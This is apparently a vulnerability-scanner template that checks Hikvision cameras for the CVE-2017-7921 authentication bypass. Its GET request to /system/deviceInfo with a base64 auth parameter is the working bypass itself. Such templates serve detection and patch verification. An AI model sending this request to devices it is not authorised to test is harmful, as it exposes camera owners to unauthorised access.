25 lines
505 B
YAML
25 lines
505 B
YAML
|
id: CVE-2017-7921
|
||
|
info:
|
||
|
name: Hikvision Authentication Bypass
|
||
|
author: princechaddha
|
||
|
severity: high
|
||
|
reference: https://www.cvedetails.com/cve/CVE-2017-7921/
|
||
|
tags: cve,cve2017,auth-bypass
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "<firmwareVersion>"
|
||
|
part: body
|
||
|
|
||
|
- type: word
|
||
|
words:
|
||
|
- "application/xml"
|
||
|
part: header
|